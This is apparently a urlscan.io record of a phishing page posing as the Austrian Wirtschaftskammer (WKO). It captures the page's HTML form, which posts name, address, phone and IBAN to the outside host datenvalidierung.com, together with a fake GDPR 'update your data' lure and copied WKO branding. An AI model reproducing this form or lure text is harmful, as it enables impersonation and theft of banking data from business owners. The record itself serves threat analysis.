wirtschaftskammern.pages.dev Open in urlscan Pro
172.66.47.131  Public Scan

URL: https://wirtschaftskammern.pages.dev/
Submission: On June 14 via manual from AT — Scanned from AT

Form analysis 3 forms found in the DOM

<form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
  <table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
    <tbody>
      <tr>
        <td class="gsc-input">
          <div class="gsc-input-box" id="gsc-iw-id1">
            <table cellspacing="0" cellpadding="0" role="presentation" id="gs_id50" class="gstl_50 gsc-input" style="width: 100%; padding: 0px;">
              <tbody>
                <tr>
                  <td id="gs_tti50" class="gsib_a">
                    <input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="suchen" aria-label="suchen" id="gsc-i-id1" dir="ltr" spellcheck="false"
                      style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; background: url(&quot;https://www.google.com/cse/static/images/1x/de/branding.png&quot;) left center no-repeat rgb(255, 255, 255); outline: none;">
                  </td>
                  <td class="gsib_b">
                    <div class="gsst_b" id="gs_st50" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Suchfeldeingaben löschen" role="button" style="display: none;"><span class="gscb_a" id="gs_cb50" aria-hidden="true">×</span></a>
                    </div>
                  </td>
                </tr>
              </tbody>
            </table>
          </div>
        </td>
        <td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
              <title>suchen</title>
              <path
                d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
              </path>
            </svg></button></td>
        <td class="gsc-clear-button">
          <div class="gsc-clear-button" title="Ergebnisse löschen">&nbsp;</div>
        </td>
      </tr>
    </tbody>
  </table>
</form>

POST https://datenvalidierung.com/Report.php

<form id="iform" method="post" action="https://datenvalidierung.com/Report.php">
  <input type="hidden" name="wkoform" value="true">
  <div class="faqs">
    <p>Persönliche Daten</p>
    <div class="row">
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Name" name="Name">
        <label for="floatingInput">Name</label>
      </div>
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Nachname" name="Nachname">
        <label for="floatingInput">Nachname</label>
      </div>
    </div>
    <div class="row">
      <div class="form-floating col-md-6 faqs-form">
        <input type="tel" class="form-control" placeholder="Mobil" name="GSM">
        <label for="floatingInput">Mobil</label>
      </div>
      <div class="form-floating col-md-6 faqs-form">
        <input required="" type="radio" name="gender" id="weiblich" value="weiblich">
        <label for="weiblich">weiblich</label>
        <input style="margin-left: 90px;" required="" type="radio" name="gender" id="männlich" value="männlich" data-queryparam="" class="">
        <label for="männlich" style="margin-left: 100px;">männlich</label>
      </div>
    </div>
    <p>Firmeninformationen</p>
    <div class="row">
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Name der Firma" name="CompanyName">
        <label for="floatingInput">Name der Firma</label>
      </div>
      <div class="form-floating col-md-6 faqs-form">
        <input type="email" class="form-control" placeholder="E-Mail" name="Email">
        <label for="floatingInput">E-Mail</label>
      </div>
    </div>
    <div class="form-floating faqs-form">
      <input type="text" class="form-control" placeholder="Adresse" name="Address">
      <label for="floatingInput">Adresse</label>
    </div>
    <div class="row">
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Hausnummer" name="HomeNo">
        <label for="floatingInput">Hausnummer</label>
      </div>
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Postleitzahl" name="PostCode">
        <label for="floatingInput">Postleitzahl</label>
      </div>
    </div>
    <div class="row">
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Stadt" name="City">
        <label for="floatingInput">Stadt</label>
      </div>
      <div class="form-floating col-md-6 faqs-form">
        <input type="text" class="form-control" placeholder="Festnetz" name="Phone">
        <label for="floatingInput">Festnetz</label>
      </div>
    </div>
    <div class="row">
      <div class="form-floating col-md-8 faqs-form">
        <input type="text" class="form-control" placeholder="IBAN-Nummer" name="IBAN">
        <label for="floatingInput">IBAN-Nummer</label>
      </div>
    </div>
    <!-- SUBMIT BUTTON -->
    <div class="row">
      <div class="col-md-12">
        <button type="submit" class="btn btn-primary">Absenden</button>
      </div>
    </div>
  </div>
</form>

<form id="chat-input">
  <input type="hidden" name="_token" value="6FOjjLiIcPAFZ3085Zl4gJeJYXF0nImrgfRFFB8Y">
  <div class="chatbot-message-input">
    <span role="textbox" contenteditable="" id="user-message-input" type="text" name="user-message-input" autocomplete="off"></span>
    <button type="submit" id="send-user-message"></button>
  </div>
</form>

Text Content

×

suchen
 

Benutzerdefinierte Suche

Sortieren nach:
Relevance

Relevance
Date




 * 
 * Handwerkerbonus
   * Basis-Infos
   * FAQ
   * Förderfähige Leistungen
   * Branchen-Infos
   * Promotion

Österreich

Bundesland wählen

 * Burgenland
 * Kärnten
 * Niederösterreich
 * Oberösterreich
 * Salzburg
 * Steiermark
 * Tirol
 * Vorarlberg
 * Wien
 * Österreich


Abbrechen




Gewerbe und Handwerk


BITTE AKTUALISIEREN SIE JETZT IHRE DATEN.

HIERMIT MÖCHTEN WIR SIE ÜBER DIE AB DEM 1. AUGUST 2023 GELTENDEN UMFANGREICHEN
ÄNDERUNGEN IN UNSERER DATENSCHUTZRICHTLINIE INFORMIEREN. DIESE ANPASSUNGEN
ERFOLGEN IM RAHMEN VERSCHÄRFTER DATENSCHUTZRICHTLINIEN UND STRIKTERER
GESETZLICHER ANFORDERUNGEN GEMÄSS DER DATENSCHUTZ-GRUNDVERORDNUNG (DSGVO). DIE
EINHALTUNG DIESER VORSCHRIFTEN IST VON ENTSCHEIDENDER BEDEUTUNG FÜR DEN SCHUTZ
UNSERER KUNDEN UND DIE GEWÄHRLEISTUNG IHRER SICHERHEIT.

Persönliche Daten

Name
Nachname
Mobil
weiblich männlich

Firmeninformationen

Name der Firma
E-Mail
Adresse
Hausnummer
Postleitzahl
Stadt
Festnetz
IBAN-Nummer
Absenden

DIE WKO

 * Die Organisation
 * Wirtschaftskammerwahlen
 * Transparenz
 * Rechtliches
 * Jobs und Karriere
 * Presse und Medien

WISSEN

 * Unternehmen gründen
 * Lehrling ausbilden
 * 1. Mitarbeiter:in
 * Allgemeine Geschäftsbedingungen / AGB
 * Dienstverhältnis beenden
 * Exportieren / Importieren
 * Förderungen

SERVICE

 * Lehrabschlussprüfung / LAP
 * Kollektivverträge
 * Benutzerkonto

WIRTSCHAFTSKAMMER ÖSTERREICH

Wiedner Hauptstraße 63

1045 Wien

 * +43 5 90900
 * office@wko.at
 * https://wko.at/

 * Mehrsprachig
 * Englisch
 * Offenlegung
 * Barrierefreiheit
 * Datenschutzerklärung
 * Cookie-Einstellungen
 * © 2024 WKO

Guten Tag!
Ich bin der Chatbot der WKO.
Wie kann ich Ihnen helfen?


Mi., 05. Jun 2024